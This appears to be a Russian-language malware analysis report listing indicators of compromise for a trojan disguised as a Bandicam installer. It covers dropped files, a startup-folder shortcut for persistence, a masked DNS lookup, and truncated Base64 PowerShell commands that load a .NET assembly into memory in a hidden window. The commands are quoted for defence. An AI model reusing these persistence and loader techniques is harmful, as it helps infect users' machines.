Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\chromium.ini.lnk (ярлык в папке автозагрузки пользователя; объекты из этой папки запускаются при входе в систему)
- %APPDATA%\bandicam.v4.4.3.1557.exe
- %APPDATA%\id.js
- %TEMP%\nsb228e.tmp
- %TEMP%\nsh22af.tmp\kg.exe
- %TEMP%\nsh22af.tmp\repackme.gif
- %TEMP%\nsh22af.tmp\newadvsplash.dll
- %TEMP%\nsh22af.tmp\langdll.dll
- %HOMEPATH%\appdata\chromium.js
- DNS ASK si##j.space
- '%APPDATA%\bandicam.v4.4.3.1557.exe'
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\ID.js"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -e IAAgAHMAbABlAGUAcAAgADgAOwAgAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBiAGEAcwBlADYANABTAHQAcgBpAG...' (со скрытым окном)
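- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -e IAAgAHMAbABlAGUAcAAgADgAOwAgAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBiAGEAcwBlADYANABTAHQAcgBpAG...
  Примечание: аргумент -e в обоих запусках PowerShell — это команда в кодировке Base64 (UTF-16LE). Видимая на странице часть декодируется как «  sleep 8; [AppDomain]::CurrentDomain.Load([Convert]::Frombase64Stri…», то есть после паузы в 8 секунд в процесс PowerShell загружается .NET-сборка, переданная в виде Base64-строки. Остальная часть команды на странице обрезана («...»), поэтому содержимое самой сборки отсюда установить нельзя.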